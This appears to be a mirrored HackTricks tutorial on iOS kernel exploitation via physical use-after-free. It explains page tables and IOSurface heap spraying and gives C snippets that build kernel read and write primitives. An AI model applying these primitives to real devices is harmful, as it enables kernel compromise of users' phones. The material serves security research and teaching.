mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-22 02:53:28 +00:00
212 lines
9.5 KiB
Markdown
212 lines
9.5 KiB
Markdown
|
# iOS Exploiting
|
|||
|
|
|||
|
## Physical use-after-free
|
|||
|
|
|||
|
This is a summary from the post from [https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html) moreover further information about exploit using this technique can be found in [https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd)
|
|||
|
|
|||
|
### Memory management in XNU <a href="#memory-management-in-xnu" id="memory-management-in-xnu"></a>
|
|||
|
|
|||
|
The **virtual memory address space** for user processes on iOS spans from **0x0 to 0x8000000000**. However, these addresses don’t directly map to physical memory. Instead, the **kernel** uses **page tables** to translate virtual addresses into actual **physical addresses**.
|
|||
|
|
|||
|
#### Levels of Page Tables in iOS
|
|||
|
|
|||
|
Page tables are organized hierarchically in three levels:
|
|||
|
|
|||
|
1. **L1 Page Table (Level 1)**:
|
|||
|
* Each entry here represents a large range of virtual memory.
|
|||
|
* It covers **0x1000000000 bytes** (or **256 GB**) of virtual memory.
|
|||
|
2. **L2 Page Table (Level 2)**:
|
|||
|
* An entry here represents a smaller region of virtual memory, specifically **0x2000000 bytes** (32 MB).
|
|||
|
* An L1 entry may point to an L2 table if it can't map the entire region itself.
|
|||
|
3. **L3 Page Table (Level 3)**:
|
|||
|
* This is the finest level, where each entry maps a single **4 KB** memory page.
|
|||
|
* An L2 entry may point to an L3 table if more granular control is needed.
|
|||
|
|
|||
|
#### Mapping Virtual to Physical Memory
|
|||
|
|
|||
|
* **Direct Mapping (Block Mapping)**:
|
|||
|
* Some entries in a page table directly **map a range of virtual addresses** to a contiguous range of physical addresses (like a shortcut).
|
|||
|
* **Pointer to Child Page Table**:
|
|||
|
* If finer control is needed, an entry in one level (e.g., L1) can point to a **child page table** at the next level (e.g., L2).
|
|||
|
|
|||
|
#### Example: Mapping a Virtual Address
|
|||
|
|
|||
|
Let’s say you try to access the virtual address **0x1000000000**:
|
|||
|
|
|||
|
1. **L1 Table**:
|
|||
|
* The kernel checks the L1 page table entry corresponding to this virtual address. If it has a **pointer to an L2 page table**, it goes to that L2 table.
|
|||
|
2. **L2 Table**:
|
|||
|
* The kernel checks the L2 page table for a more detailed mapping. If this entry points to an **L3 page table**, it proceeds there.
|
|||
|
3. **L3 Table**:
|
|||
|
* The kernel looks up the final L3 entry, which points to the **physical address** of the actual memory page.
|
|||
|
|
|||
|
#### Example of Address Mapping
|
|||
|
|
|||
|
If you write the physical address **0x800004000** into the first index of the L2 table, then:
|
|||
|
|
|||
|
* Virtual addresses from **0x1000000000** to **0x1002000000** map to physical addresses from **0x800004000** to **0x802004000**.
|
|||
|
* This is a **block mapping** at the L2 level.
|
|||
|
|
|||
|
Alternatively, if the L2 entry points to an L3 table:
|
|||
|
|
|||
|
* Each 4 KB page in the virtual address range **0x1000000000 -> 0x1002000000** would be mapped by individual entries in the L3 table.
|
|||
|
|
|||
|
### Physical use-after-free
|
|||
|
|
|||
|
A **physical use-after-free** (UAF) occurs when:
|
|||
|
|
|||
|
1. A process **allocates** some memory as **readable and writable**.
|
|||
|
2. The **page tables** are updated to map this memory to a specific physical address that the process can access.
|
|||
|
3. The process **deallocates** (frees) the memory.
|
|||
|
4. However, due to a **bug**, the kernel **forgets to remove the mapping** from the page tables, even though it marks the corresponding physical memory as free.
|
|||
|
5. The kernel can then **reallocate this "freed" physical memory** for other purposes, like **kernel data**.
|
|||
|
6. Since the mapping wasn’t removed, the process can still **read and write** to this physical memory.
|
|||
|
|
|||
|
This means the process can access **pages of kernel memory**, which could contain sensitive data or structures, potentially allowing an attacker to **manipulate kernel memory**.
|
|||
|
|
|||
|
### Exploitation Strategy: Heap Spray
|
|||
|
|
|||
|
Since the attacker can’t control which specific kernel pages will be allocated to freed memory, they use a technique called **heap spray**:
|
|||
|
|
|||
|
1. The attacker **creates a large number of IOSurface objects** in kernel memory.
|
|||
|
2. Each IOSurface object contains a **magic value** in one of its fields, making it easy to identify.
|
|||
|
3. They **scan the freed pages** to see if any of these IOSurface objects landed on a freed page.
|
|||
|
4. When they find an IOSurface object on a freed page, they can use it to **read and write kernel memory**.
|
|||
|
|
|||
|
More info about this in [https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups)
|
|||
|
|
|||
|
### Step-by-Step Heap Spray Process
|
|||
|
|
|||
|
1. **Spray IOSurface Objects**: The attacker creates many IOSurface objects with a special identifier ("magic value").
|
|||
|
2. **Scan Freed Pages**: They check if any of the objects have been allocated on a freed page.
|
|||
|
3. **Read/Write Kernel Memory**: By manipulating fields in the IOSurface object, they gain the ability to perform **arbitrary reads and writes** in kernel memory. This lets them:
|
|||
|
* Use one field to **read any 32-bit value** in kernel memory.
|
|||
|
* Use another field to **write 64-bit values**, achieving a stable **kernel read/write primitive**.
|
|||
|
|
|||
|
Generate IOSurface objects with the magic value IOSURFACE\_MAGIC to later search for:
|
|||
|
|
|||
|
```c
|
|||
|
void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) {
|
|||
|
if (*nClients >= 0x4000) return;
|
|||
|
for (int i = 0; i < nSurfaces; i++) {
|
|||
|
fast_create_args_t args;
|
|||
|
lock_result_t result;
|
|||
|
|
|||
|
size_t size = IOSurfaceLockResultSize;
|
|||
|
args.address = 0;
|
|||
|
args.alloc_size = *nClients + 1;
|
|||
|
args.pixel_format = IOSURFACE_MAGIC;
|
|||
|
|
|||
|
IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size);
|
|||
|
io_connect_t id = result.surface_id;
|
|||
|
|
|||
|
(*clients)[*nClients] = id;
|
|||
|
*nClients = (*nClients) += 1;
|
|||
|
}
|
|||
|
}
|
|||
|
```
|
|||
|
|
|||
|
Search for **`IOSurface`** objects in one freed physical page:
|
|||
|
|
|||
|
```c
|
|||
|
int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) {
|
|||
|
io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000);
|
|||
|
int nSurfaceIDs = 0;
|
|||
|
|
|||
|
for (int i = 0; i < 0x400; i++) {
|
|||
|
spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs);
|
|||
|
|
|||
|
for (int j = 0; j < nPages; j++) {
|
|||
|
uint64_t start = puafPages[j];
|
|||
|
uint64_t stop = start + (pages(1) / 16);
|
|||
|
|
|||
|
for (uint64_t k = start; k < stop; k += 8) {
|
|||
|
if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) {
|
|||
|
info.object = k;
|
|||
|
info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1];
|
|||
|
if (self_task) *self_task = iosurface_get_receiver(k);
|
|||
|
goto sprayDone;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
sprayDone:
|
|||
|
for (int i = 0; i < nSurfaceIDs; i++) {
|
|||
|
if (surfaceIDs[i] == info.surface) continue;
|
|||
|
iosurface_release(client, surfaceIDs[i]);
|
|||
|
}
|
|||
|
free(surfaceIDs);
|
|||
|
|
|||
|
return 0;
|
|||
|
}
|
|||
|
```
|
|||
|
|
|||
|
### Achieving Kernel Read/Write with IOSurface
|
|||
|
|
|||
|
After achieving control over an IOSurface object in kernel memory (mapped to a freed physical page accessible from userspace), we can use it for **arbitrary kernel read and write operations**.
|
|||
|
|
|||
|
**Key Fields in IOSurface**
|
|||
|
|
|||
|
The IOSurface object has two crucial fields:
|
|||
|
|
|||
|
1. **Use Count Pointer**: Allows a **32-bit read**.
|
|||
|
2. **Indexed Timestamp Pointer**: Allows a **64-bit write**.
|
|||
|
|
|||
|
By overwriting these pointers, we redirect them to arbitrary addresses in kernel memory, enabling read/write capabilities.
|
|||
|
|
|||
|
#### 32-Bit Kernel Read
|
|||
|
|
|||
|
To perform a read:
|
|||
|
|
|||
|
1. Overwrite the **use count pointer** to point to the target address minus a 0x14-byte offset.
|
|||
|
2. Use the `get_use_count` method to read the value at that address.
|
|||
|
|
|||
|
```c
|
|||
|
uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) {
|
|||
|
uint64_t args[1] = {surfaceID};
|
|||
|
uint32_t size = 1;
|
|||
|
uint64_t out = 0;
|
|||
|
IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0);
|
|||
|
return (uint32_t)out;
|
|||
|
}
|
|||
|
|
|||
|
uint32_t iosurface_kread32(uint64_t addr) {
|
|||
|
uint64_t orig = iosurface_get_use_count_pointer(info.object);
|
|||
|
iosurface_set_use_count_pointer(info.object, addr - 0x14); // Offset by 0x14
|
|||
|
uint32_t value = get_use_count(info.client, info.surface);
|
|||
|
iosurface_set_use_count_pointer(info.object, orig);
|
|||
|
return value;
|
|||
|
}
|
|||
|
```
|
|||
|
|
|||
|
#### 64-Bit Kernel Write
|
|||
|
|
|||
|
To perform a write:
|
|||
|
|
|||
|
1. Overwrite the **indexed timestamp pointer** to the target address.
|
|||
|
2. Use the `set_indexed_timestamp` method to write a 64-bit value.
|
|||
|
|
|||
|
```c
|
|||
|
void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) {
|
|||
|
uint64_t args[3] = {surfaceID, 0, value};
|
|||
|
IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0);
|
|||
|
}
|
|||
|
|
|||
|
void iosurface_kwrite64(uint64_t addr, uint64_t value) {
|
|||
|
uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object);
|
|||
|
iosurface_set_indexed_timestamp_pointer(info.object, addr);
|
|||
|
set_indexed_timestamp(info.client, info.surface, value);
|
|||
|
iosurface_set_indexed_timestamp_pointer(info.object, orig);
|
|||
|
}
|
|||
|
```
|
|||
|
|
|||
|
#### Exploit Flow Recap
|
|||
|
|
|||
|
1. **Trigger Physical Use-After-Free**: Free pages are available for reuse.
|
|||
|
2. **Spray IOSurface Objects**: Allocate many IOSurface objects with a unique "magic value" in kernel memory.
|
|||
|
3. **Identify Accessible IOSurface**: Locate an IOSurface on a freed page you control.
|
|||
|
4. **Abuse Use-After-Free**: Modify pointers in the IOSurface object to enable arbitrary **kernel read/write** via IOSurface methods.
|
|||
|
|
|||
|
With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices).
|